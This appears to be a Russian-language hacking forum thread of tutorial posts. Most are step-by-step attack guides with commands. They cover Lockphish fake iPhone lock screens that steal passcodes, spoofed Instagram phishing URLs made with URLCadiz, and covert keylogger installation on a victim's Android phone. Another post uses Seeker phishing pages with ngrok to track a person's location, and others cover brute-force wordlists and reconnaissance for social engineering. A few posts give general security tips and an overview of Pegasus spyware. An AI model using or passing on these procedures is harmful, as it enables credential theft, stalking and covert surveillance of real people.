https://i.gyazo.com/a6f0a8e4aab3b7395c9eb104bdc3a175.jpg
DDoS-атака — это разновидность кибератаки, при которой злоумышленники используют сеть скомпрометированных устройств, чтобы перегрузить целевой сервер или сеть. Для расследования DDoS-атак используйте следующие инструменты:
Shodan: поисковая система для устройств, подключенных к Интернету, может определять потенциальные цели DDoS-атак.
DDoS Map: карта DDoS-атак в реальном времени, происходящих по всему миру.
NetFlow Analyzer: этот инструмент может отслеживать сетевой трафик и выявлять потенциальные DDoS-атаки.
Wireshark: анализатор сетевых протоколов может внализировать трафик, указывающий на DDoS-атаку.
Black Lotus Labs: платформа для анализа угроз, которая предоставляет информацию о DDoS-атаках и других киберугрозах.
Кража интеллектуальной собственности и пиратство
https://i.gyazo.com/08c8f1a5a0cbe9e2d40725a6b4de4d94.jpg
Пиратство - кража защищенных авторским правом или запатентованных материалов и интеллектуальной собственности. Пользователи могут использовать ниже указанные инструменты для выявления пиратского контента:
Оповещения Google: инструмент для отслеживания в Интернете упоминаний определенных ключевых слов, включая названия брендов или продуктов. Может быть полезно для выявления случаев нарушения прав на товарный знак или авторских прав.
TinEye: Инструмент обратного поиска картинок позволяет пользователям выявлять случаи кражи изображений, загружая их или вводя URL-адрес.
Инструменты для борьбы с пиратством: существует несколько инструментов для борьбы с пиратством, позволяющих отслеживать и блокировать незаконные загрузки материалов, защищенных авторским правом. Например, DMCA.com и Copyright Alliance.
Заключение
OSINT играет важную роль в расследовании киберпреступлений, включая фишинговые атаки, онлайн-мошенничество, кражу личных данных, атаки вредоносных программ и многое другое. Используя вышеуказанные инструменты и методы, пользователи могут собирать и анализировать данные из различных онлайн-источников. Таким образом, при правильном подходе и грамотном использовании инструментов OSINT-расследования могут смягчить или даже предотвратить негативные последствия киберугроз.
BlackMAST
29.05.2023, 17:21
Фишинг с Lockphish: как взломать пароль на iPhone
https://i.gyazo.com/6485eaa7bca3d4b406055469f8cbc405.jpg
Вступить в наш чат
IOS по праву считается самой защищенной мобильной операционной системой. А взлом пароля iPhone — один из самых востребованных запросов в поисковике, который интересует всех пользователей. Что ж, сегодня мы покажем вам один простой и неординарный способ взломать iPhone с помощью инструмента Lockphish.
https://i.gyazo.com/4a7d47f7fea2f276778510100b7132a6.jpg
Дисклеймер:Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Как работает взлом:
Для этого взлома мы будем использовать инструмент Lockphish и социальную инженерии. Мы отправим вредоносную ссылку, открыв её, жертва попадет на фишинговую страницу, которая будет выглядеть точно так же, как экран блокировки iPhone. Когда жертва разблокирует экран с помощью своего пароля, он будет перехвачен, и мы получим доступ к паролю. Жертва посчитает, что просто случайно заблокировала экран, хотя на самом деле это был взлом.
Как разблокировать iPhone с помощью Lockphish:
Шаг 1: Клонируйте Lockphish на свой Kali Linux с помощью следующей команды:
git clone https://github.com/JasonJerry/lockphish
https://i.gyazo.com/3ddb71712293ac47b551e059d844db80.jpg
Шаг 2: Теперь измените каталог на папку, как показано ниже:
cd lockphish
https://i.gyazo.com/bd2fc839cf52c831ebb8338b9b43c25d.png
Шаг 3: Теперь запустите lock phish:
bash lockphish.sh
Шаг 4: Нажмите Enter, чтобы использовать ссылку YouTube по умолчанию, или укажите ссылку, на которую вы хотите перенаправить жертву, как показано ниже:
https://i.gyazo.com/d8bef652705ea2c90e8f685678a8696e.jpg
Шаг 5: Нажмите Enter, и вредоносная ссылка будет создана автоматически.
https://i.gyazo.com/63f285399ff9d63623c99fb0feb433ff.jpg
Шаг 6: Отправьте эту ссылку жертве. Вы также можете использовать инструмент сокращения URL-адресов, чтобы он не выглядел подозрительным.
Шаг 7: Жертва увидит обычный экран блокировки. Когда она введет пароль на поддельной странице, он будет отправлен вам.
Поздравляем! Теперь у вас есть доступ к паролю экрана блокировки жертвы.
Заключение:
Таким образом, в сегодняшней статье мы узнали, как можно использовать инструмент Lockphish для взлома пароля iPhone. Безусловно, этот метод требует определенных навыков социальной инженерии, но при правильном подходе и соблюдении всех шагов, вы сможете успешно выполнить взлом. На этом все. Удачи!
BlackMAST
01.06.2023, 17:29
Поиск информации с помощью Harvester
https://i.gyazo.com/1fcb83785f4714d8a2bbf14702b1c2d5.jpg
Вступить в наш чат
Сегодня мы расскажем вам об инструменте для сбора информации и тестировании на проникновение. Harvester (он же Харвестер — «жнец», «комбайн») — инструмент OSINT для получения информации об адресах электронной почты, поддоменах, именах сотрудников, открытых портах, баннерах и прочих данных о конкретном человеке или организации.
Уникальность заключается в том, что Harvester не использует никаких продвинутых алгоритмов для взлома паролей, тестирования брандмауэров или прослушивания данных в сетях. Вместо этого он автоматически собирает общедоступную информацию, доступную в Интернете: Яндекс, Google и Bing, а также соцсети LinkedIn, Twitter и Google+.
https://i.gyazo.com/8a860a3a960308b605d2ab7e86c5cdf4.jpg
Зачем собирать общедоступную информацию, спросите вы?
Что ж, в любой задаче по хакингу первое, что вам нужно сделать, — это узнать свою цель. Чем больше у вас информации о цели, тем легче её взломать. Вы можете получить много полезной информации и использовать её для атак социальной инженерии.
Использование Харвестера
Этот инструмент предустановлен в Kali Linux, и его можно запустить с помощью следующей команды:
the harvester
В качестве примера можно использовать следующие параметры:
theharvester -d cvcc.edu -l 500 -b google -f myresults.html
В приведенном выше примере указан домен, где -l показывает лимит результатов, а -b указывает источник данных. Параметр -f экспортирует результаты в файл.
В инструменте также можно использовать следующие параметры:
https://i.gyazo.com/02e5a895c895e1890d8dee13876e4e72.jpg
d: имя домена или компании (в России часто прокатит только веб-адрес);
-b: источник данных; Harvester поддерживает целую кучу поисковиков и соцсетей (по его заверениям, впрочем). Среди них: bing, google, googleCSE, googleplus, google-profiles, linkedin, pgp, twitter, vhost, yandex, yahoo и куча всего, мало для нас пригодного; в командах Харвестера эти поисковики и соцсети так и подаются: со строчной буквы, без специальных символов;
-s: отсеивает ложные или пустые переходы в первых результатах выдачи (по умолчанию не активна — 0);
-v: проверяет имя хоста и ищет хосты виртуальные;
-f: сохранить результаты в документ форматов HTML и XML;
-n: проводит обратный DNS запрос по всем обнаруженным цепочкам адресов;
-c: попытается про-брутфорсить DNS с целью выявить реальное доменное имя;
-t: попытается развернуть весь путь до домена верхнего уровня;
-e: задать определённый DNS сервер;
-l: ограничит число результатов поиска, с которыми скрипт будет работать (не всегда чем тем лучше; PGP вообще эту опцию не понимает);
-h: попросит справку в SHODAN-сервисе по поводу зарегистрированных на этот адрес или ранее замеченных рядом хостов.
Прелесть подобных программ заключается в том, что их использование не несёт никаких последствий: ваше право узнавать о жертве максимум информации, при всём том, что эта информация собирается из открытых источников, где сам пользователь её и опубликовал.
BlackMAST
05.06.2023, 17:38
Создаем фишинговые URL-адреса как профи
https://i.gyazo.com/e6d9b6885ed8e56d6387a3f530ccd503.jpg
Вступить в наш чат
Социальная инженерия — одна из самых опасных техник в хакерском арсенале. В сочетании с фишингом хакеры могут легко взломать любое устройство. В интернет пространстве появляются все более и более продвинутые способы взлома, которые создают проблемы как для компаний, так и для обычных пользователей. Про один из таких передовых методов, который может сбить с толку даже профессионалов, мы сегодня и расскажем. Читайте дальше и вы узнаете, как хакеры создают поддельные URL-адреса известных сайтов с помощью инструмента URLCadiz.
https://i.gyazo.com/7b32bef36da25f7a1410c43718354e15.jpgСоздаем фишинговые URL-адреса
Шаг 1: Загрузите инструмент URLCadiz с помощью следующей команды в терминале Kali Linux:
git clone https://github.com/PerezMascato/URLCADIZ
https://i.gyazo.com/a8eac17148b2bca0214861252b1473ff.jpgШаг 2: установите зависимости:
sudo pip3 install pyshorteners
Шаг 3: Измените каталог на папку и запустите инструмент с помощью следующей команды:
cd URLCADIZ
python3 URLCADIZ.py
https://i.gyazo.com/ee662d2d91e925a59422dbce0e80847b.jpg
Шаг 4: После запуска инструмента вы сможете выбрать любой URL-адрес из предложенных. В качестве примера мы возьмем Instagram.
https://i.gyazo.com/1eb7a62417b1969a13e0ea7f8020a802.jpgШаг 5: Далее введите адрес вашей поддельной фишинговой страницы.
https://i.gyazo.com/2c8a03f2d3bc11bf5c73f1526b474871.jpgШаг 6: После вам необходимо ввести адрес, который увидит жертва. Убедитесь, что он достаточно длинный для объединения.
https://i.gyazo.com/8d84e4075d3610f53b782e169b3e0cf3.jpg
Шаг 7: Вот и все, теперь у вас есть фишинговый URL, как показано ниже:
https://i.gyazo.com/1f0f093fa9a68999f94e3a99e8674ba0.jpgБольшин ство пользователей не могут отличить этот URL от реального. Они выглядят настолько похожими, что почти все думают, что это на самом деле страница в Instagram.
На скриншоте ниже показано, как он выглядит в браузере:
https://i.gyazo.com/3bd0f2ef646e279496fc22f343c76269.jpg
Вот так хакеры взламывают Instagram и другие учетные записи социальных сетей с помощью фишинговых URL-адресов и социальной инженерии. Обязательно проверяйте URL-адреса, прежде чем переходить по каким-либо ссылкам. На этом все. Удачи!
BlackMAST
08.06.2023, 22:12
Что такое кейлоггер. Обзор бесплатного приложения для Android
https://i.gyazo.com/6be65243307a158da41cbf9b77d8e900.jpg
Вступить в наш чат
На ряду с развитием кибербезопасности, совершенствуются и хакерские инструменты, обнаружить которые становится все труднее и труднее. Многие из них широко используются для взлома и других незаконных действий. Возможно, самым неприятным из этих инструментов является кейлоггер, разновидность вредоносного ПО, которое вам никак не захочется иметь на своем телефоне или компьютере.
Но что такое кейлоггер? Почему киберпреступники используют такие программы? Как установить кейлоггер? И есть ли способ обезопасить себя?
https://i.gyazo.com/09eb907931f17db0b25d63734f7198ac.jpg
Что такое кейлоггер
Кейлоггер (Keylogger) — это программа, регистрирующая действия пользователя: нажатия клавиш на клавиатуре, движения и клики мышью и т.д. Кейлоггер или клавиатурный шпион позволяет хакерам получать любую конфиденциальную информацию из первоисточника.
Существует несколько способов заражения кейлоггерами:
Фишинг;
Файлы с непроверенных сайтов. Вредоносный код может встроиться в ПО или в ОС и начать перехват данных.
Как установить кейлоггер
Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несем ответственности за ваши действия.
Сейчас мы расскажем про совершенно бесплатный кейлоггер для Android под названием Loki Board. Это простое в использовании приложение, которое может записывать все нажатия на телефоне жертвы.
Шаг 1: Скачайте кейлоггер Lokiboard из Google Play.
Шаг 2: Установите приложение на целевое устройство.
Шаг 3: Откройте раздел «Язык и ввод» в настройках системы Android, как показано ниже:
https://i.gyazo.com/a24de71faf5ca03123d18909ca4c7a6b.jpg
Далее включите Lokiboard и отключите все другие формы ввода.
Шаг 4: Доступ к настройкам LokiBoard можно получить, коснувшись приложения в разделе «Язык и Ввод».
Существует множество параметров настройки, которые можно использовать для того, чтобы клавиатура выглядела так же, как и клавиатура Google.
Шаг 5: Как только жертва наберет текст на клавиатуре, журналы нажатий клавиш будут автоматически созданы. С помощью файлов вы можете легко получить доступ к украденным данным кейлоггера. Путь показан ниже:
https://i.gyazo.com/4548d50c0084de4a555d08c33e38da76.jpg
Готово! Теперь ничто не ускользнёт от вашего взора.
Как очистить свое устройство от кейлоггера
Устанавливайте приложения только из плеймаркета. Благодаря этому ваш телефон станет намного безопаснее и надежнее;
Установите антивирус. Это повысит безопасность вашего телефона, а также поможет обнаружить и устранить шпионское ПО;
Если вы используете iPhone, и ваше устройство было взломано, то обновите его до более новой версии или вовсе переустановите ios;
Для установки шпионских приложений требуется либо физический доступ, либо невнимательность пользователя. Обязательно установите хороший пароль для вашего устройства, который не так-то просто взломать. Убедитесь, что вы не переходите по неизвестным ссылкам и не загружаете приложения из браузера;
Проведите чистку приложений с вашего устройства. Удалите все неизвестные приложения или те, которыми вы не пользуетесь;
И последнее, но не менее важное: перезагрузите устройство, если вы не можете удалить вирус или обнаружить шпионское ПО. Если ничего из вышеназванного не помогло, то попробуйте сделать резервную копию всех файлов, предварительно просканировав их антивирусом. Не создавайте резервные копии приложений. Сохраните только самое важное, а затем сбросьте устройство до заводских установок. Этот способ всегда работает.
А на этом все. Удачи!
BlackMAST
13.06.2023, 09:57
https://i.gyazo.com/458282c92630867f040fbd2362960c40.jpg
Вступить в наш чат
Интернет занимает значительную часть нашей повседневной жизни: от общения с друзьями в социальных сетях до заказа еды — нет ничего, что вы не смогли бы сделать онлайн. Наряду с этим появляются риски, которые нельзя игнорировать. Таким образом, кибербезопасность стала одной из самых обсуждаемых тем последних лет. Для того чтобы говорить о трендах на будущее – необходимо разобраться с ситуацией в кибербезопасности, которая сложилась в первой половине 2023 года.
Очевидно, что масштаб киберугроз увеличивается с каждым днем: возрастает количество утечек данных и взломов.
Первый квартал 2023 года запомнился несколькими резонансными компьютерными атаками, которыми подверглись российские пользователи. Например, в одной из серии атак злоумышленники шифровали устройства жертв и оставляли записку, в которой открыто заявляли о своей политической мотивации.
Утечки баз данных информационных систем, в которых содержатся конфиденциальные сведения продолжают оставаться на высоком уровне. Данный факт вызывает обеспокоенность, так как они могут быть использованы злоумышленниками для совершения более сложных атак, в том числе с применением методов социальной инженерии.
Новым вектором угроз стали фишинговые атаки, направленные на пользователей мессенджера Telegram, а простота и быстрота осуществления подобного вида атак за короткое время сделали их массовыми.
А что вы делаете для своей безопасности в Интернете?Сегодня мы расскажем про меры кибербезопасности, которые необходимо принять в 2023 году.
VPN в помощь
https://i.gyazo.com/5298470eeb37dd6ff9022a80ada64d9e.jpg
Надежные VPN, такие как Surfshark, CyberGhost и NordVPN, — это ваша первая линия защиты. Не пренебрегайте VPN ради вашей безопасности и конфиденциальности в Интернете.
VPN скрывают и шифруют онлайн-трафик, скрывая местоположение и IP-адрес, а также маскируют всю онлайн-активность от шпионов, интернет-провайдеров, веб-сайтов и даже правительства.
Если вы используете VPN, данные, передаваемые между веб-сайтом и сервером, будут проходить через зашифрованный туннель. Если хакеру удастся получить доступ к этим данным, он увидит бессмысленные тексты. Вот почему вы всегда должны включать VPN при подключении к сети.
Помимо обеспечения онлайн-безопасности и защиты, VPN позволяет пользователям получать доступ к геоблокируемому контенту, что особенного актуально для российский пользователей.
Многофакторная аутентификация
https://i.gyazo.com/e51817ab681288fe50c854942d49db77.jpg
Многофакторная аутентификация — это процесс обеспечения безопасности, который требует от пользователей подтверждения своей личности различными способами. МА широко используется для защиты электронных кошельков и учетных записей в Интернете.
Если MА включена, вам нужно будет подтвердить доступ к своей учетной записи, введя код безопасности, отправленный на ваш телефон или электронную почту. Вы также можете включить биометрическую аутентификацию.
Установите надежный пароль
https://i.gyazo.com/230fa51030c512f708caf21cbd0e0146.jpg
Использование надежного пароля — простая, но эффективная мера кибербезопасности. Вы должно быть думаете: «Все уже знают об этом! Сколько можно об этом говорить?». Но вы будете удивлены, узнав, что многие люди до сих пор продолжают устанавливать в качестве пароля дату своего дня рождения, имя матери, кличку домашнего питомца.
Когда дело доходит до создания паролей, не руководствуетесь правилом: «главное, чтобы легко запоминалось», вместо этого подумайте о безопасности своей учетной записи и о том, насколько хорошо вы можете защитить ее от хакеров. Вот почему вы должны воздерживаться от использования одного и того же пароля для нескольких учетных записей. Использовать разные пароли для всех своих аккаунтов.
Несколько советов по созданию надежных паролей:
Пароли должны содержать более восьми символов;
Не используйте один и тот же пароль дважды;
Никогда не используйте пароли, которые легко запомнить, и не оставляйте подсказки для хакеров, используя дату своего рождения или другую личную информацию;
Используйте по крайней мере одну строчную букву, одну прописную букву, одну цифру и несколько специальных символов;
Часто меняйте пароль.
Используйте антивирусы и брандмауэры
https://i.gyazo.com/022ffc2c6fc5735e994b4103c0734ceb.jpg
В хакерском арсенале существует много различных методов для атаки: шпионское ПО, трояны, фишинг и вирусы. Вы можете положить конец этим попыткам, установив антивирусное программное обеспечение и включив брандмауэр. Это обезопасит ваше устройство от этих атак. Убедитесь, что используемый вами антивирус и брандмауэр регулярно обновляются.
Обновляйте программное обеспечение
https://i.gyazo.com/b1dbef2a2db92d1f228bf2aacf80ac5b.jpg
Обновление ПО — один из самых важных советов по кибербезопасности, поскольку хакеры быстро находят уязвимости старых систем и используют их против вас. Обновления программного обеспечения закрывают дыры в безопасности и гарантируют, что ваша система будет защищена от попыток взлома.
Вот еще несколько советов для вашей безопасности:
Не используйте незащищенные соединения Wi-Fi без VPN;
Не загружайте фильмы, песни или приложения с ненадежных сайтов. Всегда проверяйте источник, прежде чем нажимать «Загрузить»;
Не нажимайте на всплывающую рекламу, которая может перенаправить вас на вредоносные веб-сайты;
Не отвечайте на электронные письма, отправленные неизвестными отправителями.
BlackMAST
26.06.2023, 17:27
Брут-словари Kali Linux на все случаи жизни
https://i.gyazo.com/1355251f376e54cb41806f07423d17a5.jpg
Вступить в наш чат
Представьте, что вы могли бы методом подбора выявить нужный пароль. Но сколько же это займёт времени, если вы будете делать это вручную? Страшно представить. А что, если за вас это сделает специальная программа, способная проверять сотни и даже тысячи паролей в минуту? Шансы на успех вырастают, не так ли? Данный метод получил название «брутфорс». Но для того, чтобы взлом увенчался успехом, необходимо иметь в своем арсенале словари под разные случаи жизни.
Усаживайтесь поудобнее, сегодня мы поделимся с вами словарями для брутфорса.
https://i.gyazo.com/638d913bd44733ab384ed9ee002aac16.jpg
Что такое атака по словарю
Брутфорс атака — метод взлома, при котором хакер подбирает логин или пароль к учетной записи с помощью перебора всех возможных вариантов.
Данный метод уже очень давно является автоматизированным, так как существует огромное количество словарей, которые регулярно обновляются.
Брутфорс словарь представляет из себя файл (часто текстовый документ), содержащий список слов самых распространенных паролей.
Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.
Списки слов в Kali Linux:
Поскольку Kali Linux изначально создавался исключительно для пентестинга, он вдоль и поперек напичкан различными словарями.
Расположение: /usr/share/wordlists
https://i.gyazo.com/48e714db71fee592a504f0d8b358c07a.jpg
DirBuster
DirBuster — это многофункциональный инструмент, предназначенный для брутфорса имён директорий, файлов приложений и серверов. В Kali Linux словари располагаются в директории/usr/share/wordlists/dirbuster/. Инструмент dirbuster имеет много дополнительных параметров. Например, существует каталог Wi-Fi, специально предназначенный для взлома аутентификации Wi-Fi.
Словари в DirBuster различаются по размеру и языкам. Мы будем использовать команду tree, чтобы вывести весь список слов внутри каталога dirb.
https://i.gyazo.com/b9689480aee19e28e3e9a12cf97e4800.jpg
Metasploit
Metasploit имеет списки слов практически для всего. В основном эти словари предназначены для брутфорса удалённого входа в различные службы, имеются неплохие универсальные словари с именами пользователей и паролями.
https://i.gyazo.com/48e714db71fee592a504f0d8b358c07a.jpg
Rockyou
Rockyou.txt представляет собой набор скомпрометированных паролей от создателя приложения MySpace, иначе называемого RockYou. В декабре 2009 года организация столкнулась с утечкой информации, в результате которой было раскрыто более 32 миллионов учетных записей клиентов.
Расположение:/usr/share/wordlists
Во время загрузки Kali Linux он будет находится в документе gz.
gzip -d /usr/share/wordlists/rockyou.txt.gz
https://i.gyazo.com/932667a0e0087868c70228afbafaaefe.jpg
Wfuzz
Wfuzz был разработан для брутфорсинга приложений. Он также может изменить запрос с GET на POST. Эта функция может быть полезной в различных ситуациях, например при проверке SQL-инъекций. Для удобства словари разделены на списки.
Расположение: /usr/share/wordlists/wfuzz
https://i.gyazo.com/215a82805859032067b56e36ca5ea94f.png
Nmap
Nmap поставляется с несколькими списками, среди которых имеется словарь с паролями. На Kali Linux все они размещены в папке: /usr/share/nmap/nselib/data/.
Заключение
Существуют различные способы взлома, но брутфорс занимает почетное первое место среди них. Методом подбора можно легко узнать пароль жертвы, особенно при помощи специальных инструментов, о которых мы вам сегодня рассказали. Надеемся, что эта статья оказалась для вас полезной. Удачи!
BlackMAST
29.06.2023, 15:00
Отслеживаем местоположение человека без доступа к телефону
https://i.gyazo.com/a530fbb5b7ff8a32753704e2f70f0d61.jpg
Вступить в наш чат
Интернет кишит услугами и советами для определения местоположения людей, но почти все они требуют прямого доступа к телефону жертвы. Что ж, в этой статье мы покажем вам более продвинутый способ для отслеживания чьего-либо местоположения с помощью инструмента Seeker. Эта статья поможет вам не только установить слежку, но и получить подробную информацию об устройстве жертвы.
https://i.gyazo.com/b96aff76f7bcb7d72e0856f2e02f2667.jpgКак работает инструмент Seeker
Шаг 1: Мы создадим фишинговый сайт, который будет запрашивать разрешение на определение местоположения. Чтобы способ сработал, нужно вооружиться навыками социальной инженерии.
Если вы все еще профан в социальной инженерии, то советуем прочитать нашустатью.
Шаг 2: Чтобы сайт выглядел убедительным и не вызывал подозрений, мы будем использовать инструменты сокращения URL-адресов.
Требования:
Kali Linux— лучшая ОС для взлома;
Seeker — для запуска фишингового сайта и анализа полученных данных для определения точного местоположения цели.
Ngrok — для создания уникальных ссылок в Интернете. Если у вас нет Kali Linux, вы также можете выполнить этот хак на nethunter или termux.
Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.
Установка Seeker в Kali Linux
Введите следующие команды, чтобы установить зависимости, необходимые для Seeker:
sudo apt-get install python3 python3-pip php ssh git
pip3 install requests
Нажмите Y, когда у вас запросят подтверждение, после чего эти зависимости будут загружены и установлены на вашем Kali Linux. Теперь установите и настройте Seeker Tool, клонировав инструмент с помощью следующей команды:
git clone https://github.com/thewhiteh4t/seeker
https://i.gyazo.com/99c2ebabb7bbee44cba3f0d15709f877.png
Теперь переключитесь в каталог Seeker, используя приведенную ниже команду:
cd seeker
https://i.gyazo.com/b049b9e4a96ad710b6bcdf554bbcd023.pngЕсли вы хотите увидеть все параметры, которые есть в приложение, введите:
python3 ./seeker.py -h
https://i.gyazo.com/ce4e228e6412adfd27f195f1aeca69a8.pngУстанов ка Ngrok в Kali Linux
Теперь вам необходимо установить Ngrok в вашей системе Kali Linux:
wget https://bin.equinox.io/c/4VmDzA7iaHb...inux-amd64.zip
https://i.gyazo.com/17a316337da8dbc61da45e63f4cd0d1f.png
Теперь разархивируйте файл:
unzip
Теперь перейдите на сайт Ngrok и завершите бесплатную регистрацию. Вы можете просто войти в свою учетную запись Google или GitHub.
https://i.gyazo.com/810a957348f2fbb2f8791c360269a1d2.png
После регистрации вы получите свой токен. Теперь введите команду с вашим токеном аутентификации:
./ngrok authtoken
Приведенная выше команда добавит ваш токен авторизации в файл ngrok.yml. Теперь изменим права доступа, чтобы Ngrok мог запускаться прямо из терминала:
****d +x ./ngrok
Вы можете открыть справку и проверить все параметры Ngrok:
./ngrok -h
https://i.gyazo.com/7892f970360cd80216a059a2f972c82d.pngУстанав ливаем слежку
Чтобы начать использовать Seeker, введите следующую команду:
python3 ./seeker.py -t manual
Вы увидите 4 шаблона, которые можно использовать для генерации страницы:
[0] NearYou
[1] Google Drive
[2] WhatsApp
[3] Telegram
Для наглядности мы выберем The Near You.
Далее создаем туннель на наш локальный сервер с помощью Ngrok:
./ngrok http 8080
Обязательно используйте 8080, а не 80, как предлагает Ngrok.
Готово, ссылка сгенерирована и будет выглядеть примерно так:
https://10f34f608fb4.ngrok.io
Теперь эту ссылку нужно отправить жертве. Вы можете использовать такой сервис, как bitly, чтобы сократить URL-адрес и сделать его похожим на любой другой URL-адрес.
Пользователь увидит следующую страницу:
https://i.gyazo.com/e7e74c28f6f421a5f53b574b01da2885.png
Страница выглядит неплохо, но вы всегда можете отредактировать HTML-файл и подстроить ее под вашу жертву. Надпись на английском говорит, что сайт позволяет найти людей поблизости и завести новые знакомства. Если пользователь нажимает кнопку «Continue» появиться запрос на определение местоположения.
https://i.gyazo.com/d67799101d6b434948a9721021e28453.png
После согласия создается файл данных, содержащий всю информацию о местоположении человека. Способ показывает лучшие результаты, если страницу открывают с мобильного устройства, поскольку все телефоны имеет модуль GPS.
Можно также использовать шаблон Gdrive, который создает фейк-страницу Google Диска.
Давайте еще рассмотрим шаблон Whatsapp для определения местоположения человека. На этот раз попробуем обойтись без Ngrok.
Вводим команду:
python3 ./seeker.py
Выбераем шаблон Whatsapp. После чего будет создана ссылка WhatsApp + Serveo.
https://i.gyazo.com/3171e5f87f211bb33130aeb5d1b6bf19.jpg
Необходимо указать название группы и расположение изображения для использования в качестве значка группы.
https://i.gyazo.com/d067efb914764e1fd7bbbbbce83025d5.png
Как только пользователь откроет ссылку WhatsApp, он увидит следующее уведомление:
https://i.gyazo.com/11a0292ecd8311b03fae5c9c14825fad.png
Запрос поможет отследить точное местоположение человека.
Точные данные о местоположении будут выглядеть так:
https://i.gyazo.com/0384feb7f819eca4a245de58d3abcf6d.pngЗаключе ние
Вот так просто вы можете отслеживать чье-либо местоположение с помощью инструмента Seeker. Конечно, вам потребуется применить социальную инженерию, а также творческий подход, но в случае успеха этот хак оправдает все ваши усилия. Надеемся, что данная статья оказалось полезной. На этом все. Удачного взлома!
BlackMAST
05.07.2023, 02:19
10 лучших хакерских поисковиков
https://i.gyazo.com/7fb24c7c301c6618a0e237e29c351450.jpg
Вступить в наш чат
Ежедневно мы используем Google и Яндекс для поиска той или иной информации в Интернете. Но знаете ли вы, что существуют и другие поисковики, позволяющие заглянуть в скрытую и малоизученную сторону глобальной сети? Интернет часто отождествляют с вебом, но WWW — это всего лишь вершина айсберга. Его глубинная часть куда разнообразнее, и хоть она скрыта от глаз рядовых пользователей, ничто не мешает изучать ее специализированными инструментами.
Существует большое количество поисковых систем, которые хакеры используют для различных целей, и сегодня мы расскажем про лучшие из них.
https://i.gyazo.com/5ec2b6ca753f7b3660a657455d07875a.jpg
1. Shodan
Shodan считается одной из лучших поисковых систем для хакеров во всем мире. Теневой аналог Гугла помогает получить информацию о любом устройстве, подключенном к Интернету. Совсем недавно его основную долю составляли роутеры, сетевые принтеры, IР-камеры, светофоры, но теперь даже некоторые лампочки имеют собственный IР-адрес. Мощные фильтры позволяют отобрать результаты по стране, городу или даже вручную по заданным координатам.
2. Censys
Censys — это сервис, похожий на Shodan, поскольку он также отслеживает устройства, которые имееют доступ в Интернет. Он собирает о них данные и предоставляет их в виде поисковой системы.
3. Greynoise
В отличие от Shodan и Censys, Greynoise позволяет идентифицировать серверы и пользователей, которые сканируют различные сети и устройства на наличие уязвимостей с помощью поисковых систем. Используя Greynoise, вы можете получить информацию о вредоносных сайтах и взломах, введя IP-адрес или ключевые слова. Это может пригодится хакерам, имеющим дело с тысячами IP-адресов, чтобы отфильтровать нежелательный фоновый интернет-шум, который мешает взлому.
4. Wigle
Wigle предназначен для поиска беспроводных сетей с помощью координат. Он показывает карту, на которой вы можете ввести широту и долготу, чтобы найти все доступные точки доступа в сети, Wi-Fi и даже телекоммуникационные антенны. Его можно использовать для мониторинга незащищенных систем, уязвимых для атак или просто для поиска открытых сетей в определенной области.
5. Zoomeye
Zoomeye — удобный хакерский инструмент, который действует как навигационная карта для поиска уязвимостей в Интернете. Он записывает многочисленные объемы данных с разных сайтов и устройств, к которым пользователи могут получить доступ, введя IP-адрес, имя устройства или любое другое ключевое слово. Помимо этого, Zoomeye показывает статистику всех устройств.
6. Hunter
Hunter можно использовать для поиска и извлечения всех адресов электронной почты, связанных с определенным доменом или организацией. Все, что вам нужно сделать, это ввести название компании в Hunter. Он отображает список адресов электронной почты, относящихся к этому домену, включая их активность и ресурсы, которые использовались для этих адресов. Разработчики также создали API для проверки электронной почты и получения дополнительной информации об организации.
7. PiPl
PiPl — крупнейший поисковик по людям в мире. Он может раскрыть все о человеке, включая его имя, контакты, место работы и другую личную информацию.
8. PublicWWW
PublicWWW — поисковик исходного кода в виде HTML, CSS, JavaScript и т. д. Используя эту поисковую систему, можно искать сайты на основе их исходного кода. Все, что вам нужно сделать, это ввести небольшую часть кода HTML, CSS или JS в поле поиска, и система предоставит вам список всех сайтов и веб-страниц, которые использовали аналогичный фрагмент кода.
9. HIBP
HIBP расшифровывается как «Have I be pwned». Это поисковая система в Интернете, которая полезна как для хакеров, так и для обычных пользователей, поскольку она проверяет учетную запись на наличие взлома, связанного с утечками данных в системе. Инструмент сканирует различные базы данных и идентифицирует утечки конкретных учетных записей.
10. OSINT Framework
Инструмент собирает информацию, доступную из общедоступных источников. Этот поисковик в основном используется правоохранительными органами, службами безопасностями, так как он включает в себя адреса электронной почты, общедоступные записи, имена пользователей, IP-адреса и многие другие параметры на выбор.
Заключение
Хакеры во всем мире активно используют эти поисковые системы для выявления уязвимостей в системах или получения информации о потенциальных целях. Однако, вышеупомянутые поисковые системы могут оказаться весьма полезными не только для хакеров, но и для обычных пользователей. Надеемся, что данная статья была полезной для вас. Удачного поиска!
BlackMAST
06.07.2023, 01:16
Pegasus: скандальное шпионское ПО взорвавшее интернет
https://i.gyazo.com/faf01b3cca0e5d8a1986c3391a92677d.jpg
Вступить в наш чат
В современном мире технологии давно уже несут не только пользу, но и опасность. Одной из таких угроз, которая потрясла мировое сообщество и повлекла за собой серьезный ущерб, стала Pegasus. В этой статье мы расскажем о происхождении шпионского ПО Pegasus, его масштабных атаках и способах защиты.
https://i.gyazo.com/d99a2c375898c1b68a0c9ab0a84a2112.jpgПроисхо ждение Pegasus
Шпионское ПО Pegasus, названное в честь мифического крылатого коня из греческой мифологии, было создано израильской технологической компанией NSO Group. Первоначально ПО разрабатывалось для благой цели — отслеживания преступников и террористов, но позже превратилось в опасное кибероружие, способное проникать в мобильные устройства. Впервые ПО Pegasus привлекло внимание общественности в 2016 году, когда известный правозащитник из ОАЭ получил подозрительное сообщение. Вместо того, чтобы перейти по ссылке в этом сообщении, Ахмед Мансур благоразумно отправил ее исследователям Citizen Lab, организации по кибербезопасности. Они обнаружили, что ссылка содержит шпионское ПО Pegasus, которое в случае активации предоставило бы злоумышленникам полный контроль над айфоном Мансура, позволяя им подслушивать разговоры, читать сообщения и собирать конфиденциальную информацию.
Как устроен Pegasus
Шпионское ПО Pegasus классифицируется как эксплойт «нулевого клика» — это означает, что оно может проникнуть на устройство без какого-либо взаимодействия с пользователем. После установки Pegasus может бесследно записывать звонки, читать сообщения и просматривать любые данные в телефоне. Пегас также может получить доступ к микрофону и камере устройства, что превращает его в мощный инструмент для слежки. Более того, Pegasus может обходить даже самые безопасные приложения, такие как WhatsApp, используя уязвимости в операционных системах.
